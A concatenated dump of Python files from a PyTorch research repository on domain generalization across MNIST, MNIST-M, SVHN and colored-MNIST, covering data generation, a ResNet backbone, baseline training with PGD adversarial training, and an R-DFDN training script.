c = c.reshape(-1, 3, 1, 1)
c= torch.from_numpy(c).type('torch.FloatTensor')
bg[:,0] = bg[:,0]* c[:,0]
bg[:,1] = bg[:,1]* c[:,1]
bg[:,2] = bg[:,2]* c[:,2]
x_rgb = x_rgb_fg + bg
x_rgb = x_rgb + torch.tensor((noise)* np.random.randn(*x_rgb.size())).type('torch.FloatTensor')
x_rgb = torch.clamp(x_rgb, 0.,255.)
if i==0:
color_data_x = np.zeros((bs* tot_iters, *img_size))
color_data_y = np.zeros((bs* tot_iters,))
color_data_x[i*bs: (i+1)*bs] = x_rgb/255.
color_data_y[i*bs: (i+1)*bs] = targets
return color_data_x, color_data_y
if __name__ == '__main__':
# dir_name = data_path + 'cmnist/' + 'fgbg_cmnist_cpr' + '-'.join(str(p) for p in args.cpr) + '/'
# print(dir_name)
# if not os.path.exists(data_path + 'cmnist/'):
# os.mkdir(data_path + 'cmnist/')
# if not os.path.exists(dir_name):
# os.mkdir(dir_name)
# color_data_x, color_data_y = gen_fgbgcolor_data(trainloader, img_size=(3,28,28), cpr=args.cpr, noise=10.)
# np.save(dir_name+ '/train_x.npy', color_data_x)
# np.save(dir_name+ '/train_y.npy', color_data_y)
# color_data_x, color_data_y = gen_fgbgcolor_data(testloader, img_size=(3,28,28), cpr=None, noise=10.)
# np.save(dir_name + 'test_x.npy', color_data_x)
# np.save(dir_name + 'test_y.npy', color_data_y)
from tqdm import trange
from time import sleep
for i in trange(4, desc='Master'):
for j in trange(10, desc='nested'):
sleep(0.1)
|
{"/eval.py": ["/data.py"], "/existing_methods.py": ["/models.py", "/data.py", "/utils.py"], "/train_RDFDN.py": ["/RDFDN.py", "/utils.py", "/data.py"], "/data.py": ["/utils.py"], "/RDFDN.py": ["/utils.py", "/resnet_base.py", "/FALoss.py", "/endecoder.py"]}
|
27,817
|
Complicateddd/R-DFDN
|
refs/heads/master
|
/eval.py
|
from argparse import Namespace
import argparse
import numpy as np
import os
import torch
import torch.nn as nn
from torch.autograd import Variable
import tqdm
from data import get_dataset
parser = argparse.ArgumentParser(description='Predicting with high correlation features')
# Directories
parser.add_argument('--data', type=str, default='datasets/',
help='location of the data corpus')
parser.add_argument('--root_dir', type=str, default='default/',
help='root dir path to save the log and the final model')
parser.add_argument('--save_dir', type=str, default='0/',
help='dir path (inside root_dir) to save the log and the final model')
# dataset
parser.add_argument('--dataset', type=str, default='mnistm',
help='dataset name')
# Adaptive BN
parser.add_argument('--bn_eval', action='store_true',
help='adapt BN stats during eval')
# hyperparameters
parser.add_argument('--seed', type=int, default=1111,
help='random seed')
parser.add_argument('--bs', type=int, default=128, metavar='N',
help='batch size')
# meta specifications
parser.add_argument('--cuda', action='store_false',
help='use CUDA')
parser.add_argument('--gpu', nargs='+', type=int, default=[0])
args = parser.parse_args()
os.environ['CUDA_VISIBLE_DEVICES'] = ','.join(str(i) for i in args.gpu)
args.root_dir = os.path.join('runs/', args.root_dir)
args.save_dir = os.path.join(args.root_dir, args.save_dir)
use_cuda = torch.cuda.is_available()
torch.manual_seed(args.seed)
if use_cuda:
torch.cuda.manual_seed(args.seed)
###############################################################################
# Load data
###############################################################################
print('==> Preparing data..')
trainloader, validloader, testloader, nb_classes, dim_inp = get_dataset(args)
def test(loader, model):
global best_acc, args
if args.bn_eval: # forward prop data twice to update BN running averages
model.train()
for _ in range(2):
for batch_idx, (inputs, targets) in enumerate(loader):
if use_cuda:
inputs, targets = inputs.cuda(), targets.cuda()
inputs, targets = Variable(inputs), Variable(targets)
_ = (model(inputs, train=False))
model.eval()
test_loss, correct, total = 0,0,0
tot_iters = len(loader)
for batch_idx in tqdm.tqdm(range(tot_iters), total=tot_iters):
inputs, targets = next(iter(loader))
if use_cuda:
inputs, targets = inputs.cuda(), targets.cuda()
with torch.no_grad():
inputs, targets = Variable(inputs), Variable(targets)
outputs = (model(inputs, train=False))
_, predicted = torch.max(nn.Softmax(dim=1)(outputs).data, 1)
total += targets.size(0)
correct += predicted.eq(targets.data).cpu().sum()
# Save checkpoint.
acc = 100.*float(correct)/float(total)
return acc
with open(args.save_dir + '/best_model.pt', 'rb') as f:
best_state = torch.load(f)
model = best_state['model']
if use_cuda:
model.cuda()
# Run on test data.
test_acc = test(testloader, model=model)
best_val_acc = test(validloader, model=model)
print('=' * 89)
status = 'Test acc {:3.4f} at best val acc {:3.4f}'.format(test_acc, best_val_acc)
print(status)
|
{"/eval.py": ["/data.py"], "/existing_methods.py": ["/models.py", "/data.py", "/utils.py"], "/train_RDFDN.py": ["/RDFDN.py", "/utils.py", "/data.py"], "/data.py": ["/utils.py"], "/RDFDN.py": ["/utils.py", "/resnet_base.py", "/FALoss.py", "/endecoder.py"]}
|
27,818
|
Complicateddd/R-DFDN
|
refs/heads/master
|
/resnet_base.py
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
class resblock(nn.Module):
def __init__(self, depth, channels, stride=1, bn='', nresblocks=1.,affine=True, kernel_size=3, bias=True):
self.depth = depth
self. channels = channels
super(resblock, self).__init__()
self.bn1 = nn.BatchNorm2d(depth,affine=affine) if bn else nn.Sequential()
self.conv2 = (nn.Conv2d(depth, channels, kernel_size=kernel_size, stride=stride, padding=1, bias=bias))
self.bn2 = nn.BatchNorm2d(channels, affine=affine) if bn else nn.Sequential()
self.conv3 = nn.Conv2d(channels, channels, kernel_size=kernel_size, stride=1, padding=1, bias=bias)
self.shortcut = nn.Sequential()
if stride > 1 or depth!=channels:
layers = []
conv_layer = nn.Conv2d(depth, channels, kernel_size=1, stride=stride, padding=0, bias=bias)
layers += [conv_layer, nn.BatchNorm2d(channels,affine=affine) if bn else nn.Sequential()]
self.shortcut = nn.Sequential(*layers)
def forward(self, x):
out = ACT(self.bn1(x))
out = ACT(self.bn2(self.conv2(out)))
out = (self.conv3(out))
short = self.shortcut(x)
out += 1.*short
return out
class ResNet(nn.Module):
def __init__(self, depth=56, nb_filters=32, num_classes=10, bn=False, affine=True, kernel_size=3, inp_channels=3, k=1, bias=False, inp_noise=0): # n=9->Resnet-56
super(ResNet, self).__init__()
self.inp_noise = inp_noise
nstage = 3
self.pre_clf=[]
assert ((depth-2)%6 ==0), 'resnet depth should be 6n+2'
n = int((depth-2)/6)
nfilters = [nb_filters, nb_filters*k, 2* nb_filters*k, 4* nb_filters*k, num_classes]
self.nfilters = nfilters
self.num_classes = num_classes
self.conv1 = (nn.Conv2d(inp_channels, nfilters[0], kernel_size=kernel_size, stride=1, padding=0, bias=bias))
self.bn1 = nn.BatchNorm2d(nfilters[0], affine=affine) if bn else nn.Sequential()
nb_filters_prev = nb_filters_cur = nfilters[0]
for stage in range(nstage):
nb_filters_cur = nfilters[stage+1]
for i in range(n):
subsample = 1 if (i > 0 or stage == 0) else 2
layer = resblock(nb_filters_prev, nb_filters_cur, subsample, bn=bn, nresblocks = nstage*n, affine=affine, kernel_size=3, bias=bias)
self.pre_clf.append(layer)
nb_filters_prev = nb_filters_cur
self.pre_clf_1 = nn.Sequential(*self.pre_clf[:n])
self.pre_clf_2 = nn.Sequential(*self.pre_clf[n:2*n])
self.pre_clf_3 = nn.Sequential(*self.pre_clf[2*n:])
def forward(self, x, ret_hid=False, train=True):
if x.size()[1]==1: # if MNIST is given, replicate 1 channel to make input have 3 channel
out = torch.ones(x.size(0), 3, x.size(2), x.size(3)).type('torch.cuda.FloatTensor')
out = out*x
else:
out = x
if self.inp_noise>0 and train:
out = out + self.inp_noise*torch.randn_like(out)
hid = self.conv1(out)
out = self.bn1(hid)
out1 = self.pre_clf_1(out)
out2 = self.pre_clf_2(out1)
class_feature = self.pre_clf_3(out2)
return hid,class_feature
if __name__ == '__main__':
pass
|
{"/eval.py": ["/data.py"], "/existing_methods.py": ["/models.py", "/data.py", "/utils.py"], "/train_RDFDN.py": ["/RDFDN.py", "/utils.py", "/data.py"], "/data.py": ["/utils.py"], "/RDFDN.py": ["/utils.py", "/resnet_base.py", "/FALoss.py", "/endecoder.py"]}
|
27,819
|
Complicateddd/R-DFDN
|
refs/heads/master
|
/existing_methods.py
|
from argparse import Namespace
import sys
import argparse
import math
import numpy as np
import os
import torch
import torch.nn as nn
from torch.autograd import Variable
from torch import autograd
import pickle as pkl
from models import ResNet_model, CNN
import torch.nn.functional as F
import glob
import tqdm
import torch.utils.data as utils
import json
from data import get_dataset
from utils import AttackPGD, add_gaussian_noise, pairing_loss
parser = argparse.ArgumentParser(description='Predicting with high correlation features')
# Directories
parser.add_argument('--data', type=str, default='datasets/',
help='location of the data corpus')
parser.add_argument('--root_dir', type=str, default='default/',
help='root dir path to save the log and the final model')
parser.add_argument('--save_dir', type=str, default='0/',
help='dir path (inside root_dir) to save the log and the final model')
parser.add_argument('--load_dir', type=str, default='',
help='dir path (inside root_dir) to load model from')
########################
### Baseline methods ###
# Vanilla MLE (simply run without any baseline method argument below)
# Projected gradient descent (PGD) based adversarial training
parser.add_argument('--pgd', action='store_true', help='PGD')
parser.add_argument('--nsteps', type=int, default=20, metavar='N',
help='num of steps for PGD')
parser.add_argument('--stepsz', type=int, default=2, metavar='N',
help='step size for 1st order adv training')
parser.add_argument('--epsilon', type=float, default=8,
help='number of pixel values (0-255) allowed for PGD which is normalized by 255 in the code')
# Input Gaussian noise
parser.add_argument('--inp_noise', type=float, default=0., help='Gaussian input noise with standard deviation specified here')
# Adversarial logit pairing (ALP/CLP)
parser.add_argument('--alp', action='store_true',
help='clean logit pairing')
parser.add_argument('--clp', action='store_true',
help='clean logit pairing')
parser.add_argument('--beta', type=float, default=0,
help='coefficient used for regularization term in ALP/CLP/VIB')
parser.add_argument('--anneal_beta', action='store_true', help='anneal beta from 0.0001 to specified value gradually')
# Variational Information Bottleneck (VIB)
parser.add_argument('--vib', action='store_true',
help='use Variational Information Bottleneck')
# Adaptive batch norm
parser.add_argument('--bn_eval', action='store_true',
help='adapt BN stats during eval')
### Baseline methods ###
########################
# dataset and architecture
parser.add_argument('--dataset', type=str, default='fgbg_cmnist_cpr0.5-0.5',
help='dataset name')
parser.add_argument('--arch', type=str, default='resnet',
help='arch name (resnet,cnn)')
parser.add_argument('--depth', type=int, default=56,
help='number of resblocks if using resnet architecture')
parser.add_argument('--k', type=int, default=1,
help='widening factor for wide resnet architecture')
# Optimization hyper-parameters
parser.add_argument('--seed', type=int, default=1111,
help='random seed')
parser.add_argument('--bs', type=int, default=128, metavar='N',
help='batch size')
parser.add_argument('--bn', action='store_true',
help='Use Batch norm')
parser.add_argument('--noaffine', action='store_true',
help='no affine transformations')
parser.add_argument('--lr', type=float, default=0.001,
help='learning rate ')
parser.add_argument('--epochs', type=int, default=200,
help='upper epoch limit')
parser.add_argument('--init', type=str, default="he")
parser.add_argument('--wdecay', type=float, default=0.0001,
help='weight decay applied to all weights')
# meta specifications
parser.add_argument('--validation', action='store_true',
help='Compute accuracy on validation set at each epoch')
parser.add_argument('--cuda', action='store_false',
help='use CUDA')
parser.add_argument('--gpu', nargs='+', type=int, default=[0])
args = parser.parse_args()
args.root_dir = os.path.join('runs/', args.root_dir)
args.save_dir = os.path.join(args.root_dir, args.save_dir)
if not os.path.exists(args.save_dir):
os.makedirs(args.save_dir)
log_dir = args.save_dir + '/'
with open(args.save_dir + '/config.txt', 'w') as f:
json.dump(args.__dict__, f, indent=2)
with open(args.save_dir + '/log.txt', 'w') as f:
f.write('python ' + ' '.join(s for s in sys.argv) + '\n')
os.environ['CUDA_VISIBLE_DEVICES'] = ','.join(str(i) for i in args.gpu)
# Set the random seed manually for reproducibility.
use_cuda = torch.cuda.is_available()
torch.manual_seed(args.seed)
if use_cuda:
torch.cuda.manual_seed(args.seed)
###############################################################################
# Load data
###############################################################################
print('==> Preparing data..')
trainloader, validloader, testloader, nb_classes, dim_inp = get_dataset(args)
###############################################################################
# Build the model
###############################################################################
epoch = 0
if args.load_dir=='':
inp_channels=3
print('==> Building model..')
if args.arch == 'resnet':
model0 = ResNet_model(bn= args.bn, num_classes=nb_classes, depth=args.depth,\
inp_channels=inp_channels, k=args.k, affine=not args.noaffine, inp_noise=args.inp_noise, VIB=args.vib)
elif args.arch == 'cnn':
model0 = CNN(bn= args.bn, affine=not args.noaffine, num_classes=nb_classes, inp_noise=args.inp_noise, VIB=args.vib)
else:
with open(args.root_dir + '/' + args.load_dir + '/best_model.pt', 'rb') as f:
best_state = torch.load(f)
model0 = best_state['model']
epoch = best_state['epoch']
print('==> Loading model from epoch ', epoch)
params = list(model0.parameters())
model = torch.nn.DataParallel(model0, device_ids=range(len(args.gpu)))
adv_PGD_config = config = {
'epsilon': args.epsilon / (255),
'num_steps': args.nsteps,
'step_size': args.stepsz / (255.),
'random_start': True
}
AttackPGD_ = AttackPGD(adv_PGD_config)
nb = 0
if args.init == 'he':
for m in model.modules():
if isinstance(m, nn.Conv2d):
nb += 1
# print ('Update init of ', m)
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d) and not args.noaffine:
# print ('Update init of ', m)
m.weight.data.fill_(1)
m.bias.data.zero_()
print( 'Number of Conv layers: ', (nb))
if use_cuda:
model.cuda()
total_params = sum(np.prod(x.size()) if len(x.size()) > 1 else x.size()[0] for x in model.parameters())
print('Args:', args)
print( 'Model total parameters:', total_params)
with open(args.save_dir + '/log.txt', 'a') as f:
f.write(str(args) + ',total_params=' + str(total_params) + '\n')
criterion = nn.CrossEntropyLoss()
###############################################################################
# Training/Testing code
###############################################################################
def test(loader, model, save=False, epoch=0):
global best_acc, args
if args.bn_eval: # forward prop data twice to update BN running averages
model.train()
for _ in range(2):
for batch_idx, (inputs, targets) in enumerate(loader):
if use_cuda:
inputs, targets = inputs.cuda(), targets.cuda()
inputs, targets = Variable(inputs), Variable(targets)
_ = (model(inputs, train=False))
model.eval()
correct, total = 0,0
tot_iters = len(loader)
for batch_idx in tqdm.tqdm(range(tot_iters), total=tot_iters):
inputs, targets = next(iter(loader))
if use_cuda:
inputs, targets = inputs.cuda(), targets.cuda()
with torch.no_grad():
inputs, targets = Variable(inputs), Variable(targets)
outputs = (model(inputs, train=False))
_, predicted = torch.max(nn.Softmax(dim=1)(outputs).data, 1)
total += targets.size(0)
correct += predicted.eq(targets.data).cpu().sum()
# Save checkpoint.
acc = 100.*float(correct)/float(total)
if save and acc > best_acc:
best_acc = acc
print('Saving best model..')
state = {
'model': model0,
'epoch': epoch
}
with open(args.save_dir + '/best_model.pt', 'wb') as f:
torch.save(state, f)
return acc
def train(epoch):
global trainloader, optimizer, args, model, best_loss
model.train()
correct = 0
total = 0
total_loss, reg_loss, tot_regularization_loss = 0, 0, 0
optimizer.zero_grad()
tot_iters = len(trainloader)
for batch_idx in tqdm.tqdm(range(tot_iters), total=tot_iters):
inputs, targets = next(iter(trainloader))
if use_cuda:
inputs, targets = inputs.cuda(), targets.cuda()
inputs = Variable(inputs)
if args.pgd:
outputs = AttackPGD_(inputs, targets, model)
loss = criterion(outputs, targets)
elif args.alp:
outputs_adv = AttackPGD_(inputs, targets, model)
loss_adv = criterion(outputs_adv, targets)
outputs = (model(inputs))
loss_clean = criterion(outputs, targets)
loss = loss_clean + loss_adv
reg_loss = pairing_loss(outputs_adv, outputs)
elif args.clp:
outputs = (model(inputs))
loss_clean = criterion(outputs, targets)
loss = loss_clean
reg_loss = pairing_loss(outputs, outputs, stochastic_pairing = True)
elif args.vib:
outputs, mn, logvar = model(inputs)
loss = criterion(outputs, targets)
reg_loss = -0.5 * torch.sum(1 + logvar - mn.pow(2) - logvar.exp())/inputs.size(0)
else:
outputs = (model(inputs))
loss = criterion(outputs, targets)
tot_regularization_loss += reg_loss
total_loss_ = loss + args.beta* reg_loss
total_loss_.backward() # retain_graph=True
total_loss += loss.data.cpu()
_, predicted = torch.max(nn.Softmax(dim=1)(outputs).data, 1)
total += targets.size(0)
correct += predicted.eq(targets.data).cpu().sum()
# nn.utils.clip_grad_norm_(model.parameters(), 0.1)
optimizer.step()
optimizer.zero_grad()
acc = 100.*correct/total
return total_loss/(batch_idx+1), acc, tot_regularization_loss/(batch_idx+1)
optimizer = torch.optim.Adam(params, lr=args.lr, weight_decay=args.wdecay)
best_acc, best_loss =0, np.inf
train_loss_list, train_acc_list, valid_acc_list, test_acc_list, reg_loss_list = [], [], [], [], []
if args.anneal_beta:
beta_ = args.beta
args.beta = 0.0001
def train_fn():
global epoch, args, best_loss, best_acc
while epoch<args.epochs:
epoch+=1
loss, train_acc, regularization_loss= train(epoch)
train_loss_list.append(loss)
train_acc_list.append(train_acc)
reg_loss_list.append(regularization_loss)
test_acc = test(testloader, model=model, save=True, epoch=epoch)
test_acc_list.append(test_acc)
if args.validation:
val_acc = test(validloader, model=model, save=False)
valid_acc_list.append(val_acc)
with open(args.save_dir + "/val_acc.pkl", "wb") as f:
pkl.dump(valid_acc_list, f)
print('val-acc acc {:3.2f}'.format(val_acc))
with open(args.save_dir + "/train_loss.pkl", "wb") as f:
pkl.dump(train_loss_list, f)
with open(args.save_dir + "/train_acc.pkl", "wb") as f:
pkl.dump(train_acc_list, f)
with open(args.save_dir + "/test_acc.pkl", "wb") as f:
pkl.dump(test_acc_list, f)
with open(args.save_dir + "/reg_loss_list.pkl", "wb") as f:
pkl.dump(reg_loss_list, f)
status = 'Epoch {}/{} | Loss {:3.4f} | acc {:3.2f} | test-acc {:3.2f} | reg_loss : {:3.4f}'.\
format( epoch, args.epochs, loss, train_acc, test_acc, regularization_loss)
print (status)
with open(args.save_dir + '/log.txt', 'a') as f:
f.write(status + '\n')
print('-' * 89)
if args.anneal_beta:
args.beta = min([beta_, 2.* args.beta])
print('beta ', args.beta)
train_fn()
status = '| End of training | best test acc {:3.4f} '.format(best_acc)
print(status)
with open(args.save_dir + '/log.txt', 'a') as f:
f.write(status + '\n')
|
{"/eval.py": ["/data.py"], "/existing_methods.py": ["/models.py", "/data.py", "/utils.py"], "/train_RDFDN.py": ["/RDFDN.py", "/utils.py", "/data.py"], "/data.py": ["/utils.py"], "/RDFDN.py": ["/utils.py", "/resnet_base.py", "/FALoss.py", "/endecoder.py"]}
|
27,820
|
Complicateddd/R-DFDN
|
refs/heads/master
|
/train_RDFDN.py
|
from RDFDN import R_DFDN, Loss
from argparse import Namespace
import sys
import argparse
import math
import numpy as np
import os
import torch
import torch.nn as nn
from torch.autograd import Variable
from torch import autograd
import pickle as pkl
import torch.nn.functional as F
from utils import correlation_reg
import glob
import tqdm
import torch.utils.data as utils
import json
from data import get_dataset
from tensorboardX import SummaryWriter
parser = argparse.ArgumentParser(description='Predicting with adgm')
# Directories
parser.add_argument('--data', type=str, default='datasets/',
help='location of the data corpus')
parser.add_argument('--root_dir', type=str, default='default/',
help='root dir path to save the log and the final model')
parser.add_argument('--save_dir', type=str, default='0/',
help='dir path (inside root_dir) to save the log and the final model')
parser.add_argument('--load_dir', type=str, default='',
help='dir path (inside root_dir) to load model from')
parser.add_argument('--use_tfboard', type=bool, default=True,
help='use tensorboard')
# Baseline (correlation based) method
parser.add_argument('--beta', type=float, default=0.1,
help='coefficient for correlation based penalty')
# adaptive batch norm
parser.add_argument('--bn_eval', action='store_true',
help='adapt BN stats during eval')
# dataset and architecture
parser.add_argument('--dataset', type=str, default='fgbg_cmnist_cpr0.5-0.5',
help='dataset name')
parser.add_argument('--arch', type=str, default='resnet',
help='arch name (resnet,cnn)')
# Optimization hyper-parameters
parser.add_argument('--seed', type=int, default=1111,
help='random seed')
parser.add_argument('--bs', type=int, default=128, metavar='N',
help='batch size')
parser.add_argument('--lr', type=float, default=0.001,
help='learning rate ')
parser.add_argument('--epochs', type=int, default=300,
help='upper epoch limit')
parser.add_argument('--init', type=str, default="he")
parser.add_argument('--wdecay', type=float, default=1e-4,
help='weight decay applied to all weights')
# meta specifications
parser.add_argument('--validation', action='store_true',
help='Compute accuracy on validation set at each epoch')
parser.add_argument('--cuda', action='store_false',
help='use CUDA')
parser.add_argument('--gpu', nargs='+', type=int, default=[0])
args = parser.parse_args()
args.root_dir = os.path.join('runs/', args.root_dir)
args.save_dir = os.path.join(args.root_dir, args.save_dir)
if not os.path.exists(args.save_dir):
os.makedirs(args.save_dir)
log_dir = args.save_dir + '/'
with open(args.save_dir + '/config.txt', 'w') as f:
json.dump(args.__dict__, f, indent=2)
with open(args.save_dir + '/log.txt', 'w') as f:
f.write('python ' + ' '.join(s for s in sys.argv) + '\n')
os.environ['CUDA_VISIBLE_DEVICES'] = ','.join(str(i) for i in args.gpu)
if args.use_tfboard:
writer = SummaryWriter("final_result")
# Set the random seed manually for reproducibility.
use_cuda = torch.cuda.is_available()
torch.manual_seed(args.seed)
if use_cuda:
torch.cuda.manual_seed(args.seed)
###############################################################################
# Load data
###############################################################################
print('==> Preparing data..')
trainloader_s, validloader_s, testloader_s, nb_classes_s, dim_inp_s = get_dataset(args)
args.dataset = 'svhn'
trainloader_svhn, validloader_svhn, testloader_svhn, nb_classes_svhn, dim_inp_svhn = get_dataset(args)
args.dataset = 'mnist'
trainloader_mnist, validloader_mnist, testloader_mnist, nb_classes_mnist, dim_inp_mnist = get_dataset(args)
args.dataset = 'mnistm'
trainloader_mnistm, validloader_mnistm, testloader_mnistm, nb_classes_mnistm, dim_inp_mnistm = get_dataset(args)
###############################################################################
# Build the model
###############################################################################
model = R_DFDN()
params = list(model.parameters())
model = torch.nn.DataParallel(model, device_ids=range(len(args.gpu)))
optimizer = torch.optim.Adam(params, lr=args.lr, weight_decay=args.wdecay)
nb = 0
if args.init == 'he':
for m in model.modules():
if isinstance(m, nn.Conv2d):
nb += 1
# print ('Update init of ', m)
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
# print ('Update init of ', m)
m.weight.data.fill_(1)
m.bias.data.zero_()
print('Number of Conv layers: ', (nb))
if use_cuda:
model.cuda()
total_params = sum(np.prod(x.size()) if len(x.size()) > 1 else x.size()[0] for x in model.parameters())
print('Args:', args)
print('Model total parameters:', total_params)
with open(args.save_dir + '/log_adgm.txt', 'a') as f:
f.write(str(args) + ',total_params=' + str(total_params) + '\n')
loss = Loss()
###############################################################################
# Training/Testing code
###############################################################################
tot_iters = len(trainloader_s)
def test(loader, model, save=False, is_generation=True):
global best_acc, args
model.eval()
correct, total = 0, 0
tot_iters = len(loader)
for batch_idx in tqdm.tqdm(range(tot_iters), total=tot_iters):
inputs, targets = next(iter(loader))
if use_cuda:
inputs, targets = inputs.cuda(), targets.cuda()
with torch.no_grad():
inputs, targets = Variable(inputs), Variable(targets)
class_pred = model(inputs, inputs, is_generation=is_generation, is_train=False)
_, predicted = torch.max(nn.Softmax(dim=1)(class_pred).data, 1)
total += targets.size(0)
correct += predicted.eq(targets.data).cpu().sum()
acc = 100. * float(correct) / float(total)
return acc
best_acc = [0, 0, 0, 0,0]
for epoch in range(args.epochs):
# adjust_lr(init_lr=1e-3, optimizer=optimizer, epoch=epoch, total_epo=args.epochs)
model.train()
correct_gen, correct_adp = 0, 0
total = 0
# totol_class_loss,totol_class_loss2,totol_regulazation_loss,totol_l=0,0,0,0
for batch_idx in tqdm.tqdm(range(tot_iters), total=tot_iters):
inputs_s, targets_s = next(iter(trainloader_s))
inputs_t, targets_t = next(iter(trainloader_mnistm))
if use_cuda:
inputs_s, targets_s = inputs_s.cuda(), targets_s.cuda()
inputs_t, targets_t = inputs_t.cuda(), targets_t.cuda()
inputs_s = Variable(inputs_s)
inputs_t = Variable(inputs_t)
hid, source_pred,tar_pred,source_inv_diff,tar_inv_diff,tar_cha_diff,tar_rec,source_inv,tar_inv= model(
sourse_input=inputs_s,tar_input=inputs_t, is_generation=False, is_train=True)
hid_1_loss, s_class_loss, t_class_loss, t_recognition_loss,fa_loss,t_diff_loss,totol_loss = loss(hid = hid,
targets = targets_s,source_pred = source_pred,tar_pred= tar_pred,source_inv_diff = source_inv_diff,tar_inv_diff = tar_inv_diff,
tar_cha_diff = tar_cha_diff,tar_rec = tar_rec,tar_img = inputs_t,source_inv = source_inv,tar_inv = tar_inv,
weight_list=[0.1,1,1,0.1,0.1,0.1])
totol_loss.backward()
_, predicted_gen = torch.max(nn.Softmax(dim=1)(source_pred).data, 1)
_, predicted_adp = torch.max(nn.Softmax(dim=1)(tar_pred).data, 1)
total += targets_s.size(0)
correct_gen += predicted_gen.eq(targets_s.data).cpu().sum()
correct_adp += predicted_adp.eq(targets_s.data).cpu().sum()
optimizer.step()
optimizer.zero_grad()
if args.use_tfboard:
writer.add_scalar("Loss/hid_1_loss", hid_1_loss.data.cpu(), global_step=tot_iters * epoch + batch_idx)
writer.add_scalar("Loss/s_class_loss", s_class_loss.data.cpu(),
global_step=tot_iters * epoch + batch_idx)
writer.add_scalar("Loss/t_class_loss", t_class_loss.data.cpu(), global_step=tot_iters * epoch + batch_idx)
writer.add_scalar("Loss/t_recognition_loss", t_recognition_loss.data.cpu(), global_step=tot_iters * epoch + batch_idx)
writer.add_scalar("Loss/fa_loss", fa_loss.data.cpu(), global_step=tot_iters * epoch + batch_idx)
writer.add_scalar("Loss/t_diff_loss", t_diff_loss.data.cpu(), global_step=tot_iters * epoch + batch_idx)
writer.add_scalar("Loss/totol_loss", totol_loss.data.cpu(), global_step=tot_iters * epoch + batch_idx)
acc_gen = 100. * correct_gen / total
acc_adp = 100. * correct_adp / total
print(f"|| Epoch: {epoch} || train_gen_acc: {acc_gen} || train_adp_acc: {acc_adp} || lr:{optimizer.state_dict()['param_groups'][0]['lr']}")
# sche.step()
if epoch % 1 == 0:
all_acc = []
svhn_test_acc = test(testloader_svhn, model, is_generation=True)
all_acc.append(svhn_test_acc)
minists_test_acc = test(testloader_s, model, is_generation=True)
all_acc.append(minists_test_acc)
mnist_test_acc = test(testloader_mnist, model, is_generation=True)
all_acc.append(mnist_test_acc)
mnistm_test_acc = test(testloader_mnistm, model, is_generation=False)
all_acc.append(mnistm_test_acc)
usps_test_acc = test(testloader_usps, model, is_generation=True)
all_acc.append(usps_test_acc)
for i in range(len(all_acc)):
if all_acc[i] > best_acc[i]:
best_acc[i] = all_acc[i]
print(
f"Epoch: {epoch} ######## best_sv{best_acc[0]}######## best_s{best_acc[1]}######## best_minist{best_acc[2]}"
f"######## best_ministm{best_acc[3]} ######## best_usps{best_acc[4]}")
writer.add_scalar("Eval/minists_test_acc", minists_test_acc, global_step=epoch)
writer.add_scalar("Eval/svhn_test_acc", svhn_test_acc, global_step=epoch)
writer.add_scalar("Eval/mnist_test_acc", mnist_test_acc, global_step=epoch)
writer.add_scalar("Eval/mnistm_test_acc", mnistm_test_acc, global_step=epoch)
writer.add_scalar("Eval/usps_test_acc", usps_test_acc, global_step=epoch)
|
{"/eval.py": ["/data.py"], "/existing_methods.py": ["/models.py", "/data.py", "/utils.py"], "/train_RDFDN.py": ["/RDFDN.py", "/utils.py", "/data.py"], "/data.py": ["/utils.py"], "/RDFDN.py": ["/utils.py", "/resnet_base.py", "/FALoss.py", "/endecoder.py"]}
|
27,821
|
Complicateddd/R-DFDN
|
refs/heads/master
|
/data.py
|
from argparse import Namespace
import argparse
import numpy as np
import os
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
import torchvision.transforms as transforms
from utils import _split_train_val
import torchvision.datasets as datasets
import torch.utils.data as utils
import errno
from PIL import Image
torch.manual_seed(0)
NUM_WORKERS = 0
def get_dataset(args):
if args.dataset=='mnist':
trans = ([ transforms.ToTensor()])
trans = transforms.Compose(trans)
fulltrainset = torchvision.datasets.MNIST(root=args.data, train=True, transform=trans, download=True)
train_set, valset = _split_train_val(fulltrainset, val_fraction=0)
trainloader = torch.utils.data.DataLoader(train_set, batch_size=args.bs, shuffle=True,
num_workers=NUM_WORKERS, pin_memory=True)
validloader = torch.utils.data.DataLoader(valset, batch_size=args.bs, shuffle=False,
num_workers=NUM_WORKERS, pin_memory=True)
test_set = torchvision.datasets.MNIST(root=args.data, train=False, transform=trans)
testloader = torch.utils.data.DataLoader(test_set, batch_size=args.bs, shuffle=False, num_workers=NUM_WORKERS)
nb_classes = 10
dim_inp=28*28
elif 'cmnist' in args.dataset:
data_dir_cmnist = args.data + 'cmnist/' + 'fgbg_cmnist_cpr0.5-0.5' + '/'
data_x = np.load(data_dir_cmnist+'train_x.npy')
data_y = np.load(data_dir_cmnist+'train_y.npy')
data_x = torch.from_numpy(data_x).type('torch.FloatTensor')
data_y = torch.from_numpy(data_y).type('torch.LongTensor')
my_dataset = utils.TensorDataset(data_x,data_y)
train_set, valset = _split_train_val(my_dataset, val_fraction=0)
trainloader = torch.utils.data.DataLoader(train_set, batch_size=args.bs, shuffle=True, num_workers=NUM_WORKERS)
validloader = torch.utils.data.DataLoader(valset, batch_size=args.bs, shuffle=False,
num_workers=NUM_WORKERS, pin_memory=True)
data_x = np.load(data_dir_cmnist+'test_x.npy')
data_y = np.load(data_dir_cmnist+'test_y.npy')
data_x = torch.from_numpy(data_x).type('torch.FloatTensor')
data_y = torch.from_numpy(data_y).type('torch.LongTensor')
my_dataset = utils.TensorDataset(data_x,data_y)
testloader = torch.utils.data.DataLoader(my_dataset, batch_size=args.bs, shuffle=False, num_workers=NUM_WORKERS)
nb_classes = 10
dim_inp=28*28* 3
elif args.dataset=='mnistm':
trans = ([transforms.ToTensor()])
trans = transforms.Compose(trans)
fulltrainset = MNISTM(root=args.data, train=True, transform=trans, download=True)
train_set, valset = _split_train_val(fulltrainset, val_fraction=0)
trainloader = torch.utils.data.DataLoader(train_set, batch_size=args.bs, shuffle=True,
num_workers=0, pin_memory=True)
validloader = torch.utils.data.DataLoader(valset, batch_size=args.bs, shuffle=False,
num_workers=0, pin_memory=True)
test_set = MNISTM(root=args.data, train=False, transform=trans)
